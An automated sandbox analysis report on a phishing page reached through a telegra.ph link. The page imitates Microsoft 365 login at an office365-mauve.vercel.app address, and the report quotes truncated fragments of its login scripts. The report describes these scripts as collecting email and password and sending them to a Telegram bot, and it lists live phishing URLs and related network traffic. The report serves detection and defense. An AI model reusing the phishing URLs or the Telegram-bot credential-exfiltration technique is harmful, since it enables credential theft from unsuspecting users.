Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://telegra.ph/Clarkson-122025-01-02

Overview

General Information

Sample URL:https://telegra.ph/Clarkson-122025-01-02
Analysis ID:1583730

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
AI detected suspicious Javascript
AI detected suspicious URL
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Javascript checks online IP of machine
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 4176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6880 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1952,i,6754150424185011467,15252481181509233838,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://telegra.ph/Clarkson-122025-01-02" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://office365-mauve.vercel.app/Joe Sandbox AI: Score: 8 Reasons: The brand 'IONOS' is a known web hosting and cloud service provider., The URL 'office365-mauve.vercel.app' does not match the legitimate domain 'ionos.com'., The URL uses 'vercel.app', which is a platform for deploying web applications, not directly associated with IONOS., The subdomain 'office365-mauve' is suspicious as it combines 'office365', a Microsoft product, with a color, which is unusual and not directly related to IONOS., The presence of 'office365' in the subdomain could be an attempt to mislead users into thinking the site is related to Microsoft Office 365, increasing the phishing risk. DOM: 2.1.pages.csv
Source: https://office365-mauve.vercel.app/next.htmlJoe Sandbox AI: Score: 9 Reasons: The brand 'Google' is well-known and typically associated with the domain 'google.com'., The URL 'office365-mauve.vercel.app' does not match the legitimate domain for Google., The URL contains 'office365', which is associated with Microsoft, not Google, indicating a potential mismatch., The use of a third-party hosting service (vercel.app) with a brand name in the subdomain is a common tactic in phishing attempts., The presence of a color name 'mauve' in the subdomain is unusual and could be an attempt to obfuscate the true nature of the site. DOM: 3.7.pages.csv
Source: 3.13..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://office365-mauve.vercel.app/js/next.js... This script demonstrates several high-risk behaviors, including data exfiltration and potential malicious intent. It collects user credentials (email and password) and sends them to an external server, likely a Telegram bot. Additionally, it retrieves the user's IP address, which could be used for further malicious purposes. While the script may have some legitimate functionality, the lack of transparency and the suspicious data transmission make it a high-risk script.
Source: URLJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://office365-mauve.vercel.app
Source: URLJoe Sandbox AI: AI detected Typosquatting in URL: https://office365-mauve.vercel.app
Source: https://office365-mauve.vercel.app/js/index.jsHTTP Parser: console.log('script file loaded');document.addeventlistener('domcontentloaded', function () { console.log('dom content loaded - initializing login functionality'); const usernameinput = document.getelementbyid('username'); const passwordinput = document.getelementbyid('password'); const nextbutton = document.getelementbyid('nextbutton'); const errormessage = document.getelementbyid('errormessage'); const errormessagepassword = document.getelementbyid('errormessagepassword'); const loginform = document.getelementbyid('loginform'); passwordinput.style.display = 'none'; nextbutton.addeventlistener('click', async function () { console.log('next button clicked - starting validation'); const trimmedusername = usernameinput.value.trim(); const trimmedpassword = passwordinput.value.trim(); if (passwordinput.style.display === 'none') { if (!trimmedusername) { errormessage.textcontent = 'please f...
Source: https://office365-mauve.vercel.app/js/next.jsHTTP Parser: document.addeventlistener('domcontentloaded', function () { console.log('dom content loaded - initializing login script'); const usernameinput = document.getelementbyid('username'); const passwordinput = document.getelementbyid('password'); const nextbutton = document.getelementbyid('nextbutton'); const errormessage = document.getelementbyid('errormessage'); const errormessagepassword = document.getelementbyid('errormessagepassword'); const loginform = document.getelementbyid('loginform'); // check for missing elements if (!usernameinput || !passwordinput || !nextbutton || !errormessage || !errormessagepassword) { console.error('initialization error: one or more form elements were not found in the dom.'); return; } // initially hide password input using a class instead of directly manipulating display passwordinput.classlist.add('hidden'); // add hidden class to hide password input initially nextbutton.addeventlistener...
Source: https://office365-mauve.vercel.app/HTTP Parser: Number of links: 0
Source: https://office365-mauve.vercel.app/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://office365-mauve.vercel.app/HTTP Parser: Title: Microsoft 365 | Home does not match URL
Source: https://office365-mauve.vercel.app/js/index.jsHTTP Parser: console.log('script file loaded');document.addeventlistener('domcontentloaded', function () { console.log('dom content loaded - initializing login functionality'); const usernameinput = document.getelementbyid('username'); const passwordinput = document.getelementbyid('password'); const nextbutton = document.getelementbyid('nextbutton'); const errormessage = document.getelementbyid('errormessage'); const errormessagepassword = document.getelementbyid('errormessagepassword'); const loginform = document.getelementbyid('loginform'); passwordinput.style.display = 'none'; nextbutton.addeventlistener('click', async function () { console.log('next button clicked - starting validation'); const trimmedusername = usernameinput.value.trim(); const trimmedpassword = passwordinput.value.trim(); if (passwordinput.style.display === 'none') { if (!trimmedusername) { errormessage.textcontent = 'please f...
Source: https://office365-mauve.vercel.app/js/next.jsHTTP Parser: document.addeventlistener('domcontentloaded', function () { console.log('dom content loaded - initializing login script'); const usernameinput = document.getelementbyid('username'); const passwordinput = document.getelementbyid('password'); const nextbutton = document.getelementbyid('nextbutton'); const errormessage = document.getelementbyid('errormessage'); const errormessagepassword = document.getelementbyid('errormessagepassword'); const loginform = document.getelementbyid('loginform'); // check for missing elements if (!usernameinput || !passwordinput || !nextbutton || !errormessage || !errormessagepassword) { console.error('initialization error: one or more form elements were not found in the dom.'); return; } // initially hide password input using a class instead of directly manipulating display passwordinput.classlist.add('hidden'); // add hidden class to hide password input initially nextbutton.addeventlistener...
Source: https://office365-mauve.vercel.app/next.htmlHTTP Parser: document.addeventlistener("domcontentloaded", function () { const dropdown = document.getelementbyid("dropdown"); const verifybutton = document.getelementbyid("verifybutton"); const appcodeinput = document.getelementbyid("appcodeinput"); const errormessage = document.getelementbyid("errormessage"); const errormessagepassword = document.getelementbyid("errormessagepassword"); const errormessageincomplete = document.getelementbyid("errormessageincomplete"); if (!dropdown) { console.error("dropdown element not found."); } if (!verifybutton) { console.error("verify button element not found."); } if (!appcodeinput) { console.error("appcode input element not found."); } if (!errormessage) { console.error("error message element not found."); } ...
Source: https://office365-mauve.vercel.app/HTTP Parser: <input type="password" .../> found
Source: https://office365-mauve.vercel.app/HTTP Parser: No <meta name="author".. found
Source: https://office365-mauve.vercel.app/HTTP Parser: No <meta name="author".. found
Source: https://office365-mauve.vercel.app/HTTP Parser: No <meta name="author".. found
Source: https://office365-mauve.vercel.app/HTTP Parser: No <meta name="author".. found
Source: https://office365-mauve.vercel.app/HTTP Parser: No <meta name="author".. found
Source: https://office365-mauve.vercel.app/HTTP Parser: No <meta name="copyright".. found
Source: https://office365-mauve.vercel.app/HTTP Parser: No <meta name="copyright".. found
Source: https://office365-mauve.vercel.app/HTTP Parser: No <meta name="copyright".. found
Source: https://office365-mauve.vercel.app/HTTP Parser: No <meta name="copyright".. found
Source: https://office365-mauve.vercel.app/HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49758 version: TLS 1.2

Networking

barindex
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: global trafficDNS traffic detected: DNS query: telegra.ph
Source: global trafficDNS traffic detected: DNS query: t.me
Source: global trafficDNS traffic detected: DNS query: edit.telegra.ph
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: office365-mauve.vercel.app
Source: global trafficDNS traffic detected: DNS query: smtpjs.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: classification engineClassification label: mal64.phis.troj.win@18/38@32/176
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1952,i,6754150424185011467,15252481181509233838,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://telegra.ph/Clarkson-122025-01-02"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1952,i,6754150424185011467,15252481181509233838,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
3
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://telegra.ph/Clarkson-122025-01-020%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
smtpjs.com
109.169.71.112
truefalse
    high
    edit.telegra.ph
    149.154.164.13
    truefalse
      high
      t.me
      149.154.167.99
      truefalse
        high
